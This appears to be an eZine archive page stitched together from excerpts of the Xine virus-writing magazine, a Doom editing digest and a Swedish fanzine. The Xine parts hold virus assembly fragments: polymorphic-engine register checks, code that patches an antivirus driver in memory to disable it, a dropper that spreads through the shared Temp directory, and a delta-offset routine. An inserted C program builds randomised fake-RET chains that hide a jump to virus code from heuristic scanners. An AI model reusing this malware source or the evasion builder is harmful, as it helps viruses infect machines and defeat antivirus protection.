Xine - issue #5 - Phile 216

Published in eZine · 4 May 2024
... _register]
        mov al, 1                       ; check the right bit
        shl ax, cl
        test ds:[register_compat], al
rc_exitrout:
        pop si ax cx
        ret
rc_check_bytesize:
        mov cl, ds:[garbage_register]
        mov al, 1
        shl ax, cl
        test ds:[register_compat + 1], al
        jnz rc_exitrout
        cmp cl, 3                       ; if < 3 must check the 8-bit halves as well
        ja gewd_regcomp_exit
        mov al, 11h
        shl ax, cl                      ; check both 8-bit regs
        test ds:[register_compat], al
        jz gewd_regcomp_exit
        mov byte ptr ds:[using_8_bits_register], 1
gewd_regcomp_exit:
        xor ah, ah                      ; just set the Z flag
        cmp ah, 0 ...

Xine - issue #5 - Phile 206

Published in eZine · 4 May 2024
... , as usual, a call or a jmp in the last section is very
; suspicious, so here we use a program opcode in order to jump to our virus.
; You will ask how, if we don't use call/jmp: well, we will fake a ret.
;
; The idea is the following:
;
; PUSHAD                          <- this is for restoring state
; PUSH Imm
; XOR dword ptr [esp], Imm
; ADD dword ptr [esp], Imm
; SUB dword ptr [esp], Imm
; ROL/ROR dword ptr [esp], Imm
; jmp to ret
;
; we have in fact two possibilities: drop this code in an alignment cave and/or
; ...
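The fake-ret transfer sketched in the Xine snippet above, as an added worked example (this is not code from the Xine phile or from any virus it describes): a small C model of the PUSH / XOR / ADD / SUB / ROL chain that computes the value the RET will pop, plus the inverse that picks the PUSH immediate so the chain decodes to a chosen address. The struct and function names, the sample target 0x00401000 and the immediates are my own choices; only the 32-bit arithmetic is modelled, nothing is executed.

```c
#include <inttypes.h>
#include <stdint.h>
#include <stdio.h>

/* Added example, not code from the Xine phile. Instead of a CALL/JMP in the
 * last section, the sequence
 *   PUSH Imm ; XOR [esp],Imm ; ADD [esp],Imm ; SUB [esp],Imm ; ROL [esp],Imm
 * is followed by a RET, which pops the decoded value as its return address. */

typedef struct {
    uint32_t push_imm; /* PUSH Imm */
    uint32_t xor_imm;  /* XOR dword ptr [esp], Imm */
    uint32_t add_imm;  /* ADD dword ptr [esp], Imm */
    uint32_t sub_imm;  /* SUB dword ptr [esp], Imm */
    uint8_t  rol_cnt;  /* ROL dword ptr [esp], Imm; x86 masks the count to 5 bits */
} fake_ret_chain;

static uint32_t rol32(uint32_t v, unsigned n)
{
    n &= 31;
    return n ? (v << n) | (v >> (32 - n)) : v;
}

static uint32_t ror32(uint32_t v, unsigned n)
{
    n &= 31;
    return n ? (v >> n) | (v << (32 - n)) : v;
}

/* Forward direction: the value left in [esp] just before RET, i.e. where
 * control goes. This is what an analyst has to compute by hand when no
 * CALL/JMP points at the virus body. */
uint32_t fake_ret_target(const fake_ret_chain *c)
{
    uint32_t v = c->push_imm;
    v ^= c->xor_imm;
    v += c->add_imm;
    v -= c->sub_imm;
    return rol32(v, c->rol_cnt);
}

/* Inverse direction: given the address to reach and any XOR/ADD/SUB/ROL
 * immediates, derive the PUSH immediate by undoing the chain in reverse.
 * Every step is invertible mod 2^32, so the other immediates can be picked
 * at random per infection without ever failing to decode. */
fake_ret_chain fake_ret_build(uint32_t target, uint32_t xor_imm, uint32_t add_imm,
                              uint32_t sub_imm, uint8_t rol_cnt)
{
    fake_ret_chain c = { 0, xor_imm, add_imm, sub_imm, (uint8_t)(rol_cnt & 31) };
    uint32_t v = ror32(target, c.rol_cnt); /* undo ROL */
    v += sub_imm;                           /* undo SUB */
    v -= add_imm;                           /* undo ADD */
    v ^= xor_imm;                           /* undo XOR */
    c.push_imm = v;
    return c;
}

/* Print the instruction sequence the Xine text sketches; the final
 * "jmp to ret" is shown as the RET itself. */
void fake_ret_print(const fake_ret_chain *c)
{
    printf("pushad\n");
    printf("push 0%08" PRIX32 "h\n", c->push_imm);
    printf("xor dword ptr [esp], 0%08" PRIX32 "h\n", c->xor_imm);
    printf("add dword ptr [esp], 0%08" PRIX32 "h\n", c->add_imm);
    printf("sub dword ptr [esp], 0%08" PRIX32 "h\n", c->sub_imm);
    printf("rol dword ptr [esp], %u\n", (unsigned)c->rol_cnt);
    printf("ret                      ; pops 0%08" PRIX32 "h\n", fake_ret_target(c));
}

int main(void)
{
    /* Constructed sample: target address and immediates chosen arbitrarily. */
    fake_ret_chain c = fake_ret_build(0x00401000u, 0xDEADBEEFu, 0x12345678u,
                                      0x0BADF00Du, 13);
    fake_ret_print(&c);
    return fake_ret_target(&c) == 0x00401000u ? 0 : 1;
}
```

The point for a scanner or an analyst is the same one the snippet makes: the bytes on disk contain no branch to the virus and no literal target address, only an immediate that becomes the address after the in-place arithmetic, so a heuristic that looks for a CALL/JMP in the last section never fires.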

Xine - issue #5 - Phile 205

Published in eZine · 4 May 2024
... ,28
        mov esi,esp
        push 28
        push esi                        ; esi = MEMORY_BASIC_INFO
        push ecx
@@fx3:  VxDCall VMM_PageQuery
        test dword ptr [esi+10h],1000h  ; mbi_state & MEM_COMMIT
        lea esp,[esp+4*3+28]            ; Fix ESP
        popad
        jnz __kavxd_2
        popad
        ret
__kavxd_2:
        inc edi
        cmp [edi],esi                   ; <esi>
        jne __kavxd_1
        call ebp
        jmp __kavxd_1
kavxd_kill_moveax:
        cmp byte ptr [edi-1],0B8h
        jne rt
        mov dword ptr [edi],-1          ; R0_xxx <-- 0xFFFFFFFF
        ret
kavxd_kill_cd20:
        cmp word ptr [edi-2],20CDh
        jne rt
kavxd_kill_both:
        mov word ptr [edi-2],0B890h     ; n ...

Xine - issue #5 - Phile 201

Published in eZine · 4 May 2024
... directories, and preserves
; the current directory. It then allocates some memory and writes the
; original 7 bytes (from the entry point) into the allocated memory. Next
; in the schedule is to drop the dropper files; the primary location is
; the <windows\system> directory, and if the user does not have sufficient
; access to write there it drops into the <windows\temp> directory. As all
; users share the same \Temp directory (with default settings), on WinNT
; this enables the virus to spread ...

Xine - issue #4 - Phile 214

Published in eZine · 4 May 2024
... [ASCII-art diagram: the virus body, the Main Thread and Threads 3, 4, 5 and 6,
; joined by double-line arrows; legend: ═ -> Thread being executed]
;
; So, as you can see, the virus body launches a thread, the main thread, and
; the main thread launches ...

Xine - issue #4 - Phile 207

Published in eZine · 4 May 2024
... of junk code that passes the control
; block-by-block to the main virus decryption loops. There are eight blocks
; written to files when the virus infects them:
;
; [ASCII-art diagram: PE Header, then Junk1 .. Junk8 laid out in the file;
;  the Entry Point leads into the junk blocks, which hand control on from
;  one to the next] ...

Xine - issue #4 - Phile 204

Published in eZine · 4 May 2024
... ;
GetDeltaOffset proc
        call getitright                 ; Oh! What is this? Incredible!
getitright:
        pop ebp
        sub ebp,offset getitright
        ret
GetDeltaOffset endp
; ===========================================================================
; Dropper unpacker (25 bytes) <<->> [LSCE] - Little Shitty Compression Engine
; ===========================================================================
;
; [ASCII-art banner: The Little and Shitty Compression Engine] ...

Doom Editing Digest Vol. 01 Nr. 301

Published in eZine · 24 Apr 2024
... is some sick pathetic cry for attention and notoriety...well you just might be right.

Have a great day,

John

ps. My mail can handle anything. UUEncode it, mime it, it won't matter.
__________________________________________________________
#include <stupidstuff.h>
#define USER "johnw"             /* John Wakelin          */
                                 /* Johnw@datametrics.com */
main()                           /* (703) 385 7700        */
{
    while (isstupid(USER))
        ignore(USER);
}

Reposted by Snider
-----------------------------------
Rainer.Spielbau ...

Munin issue 3

Published in eZine · 21 Apr 2024
... lv. And I seem to remember that I thought it was really great. But then there is that thing about memory, which sometimes makes things up on its own. PS (on the outside of the envelope): In your list in Munin 2 you forgot two short stories by Kjell Jarn, "Mattias" and "Tuppen", published in Spektra #61. Or don't the fanzines count? Sure, I'm a bit cracked. But as Pippi Långstrump said about her freckles: "But I don't suffer from them." Nor do I find the Star Wars books or some of the fantasy output especially interesting, but I ho ...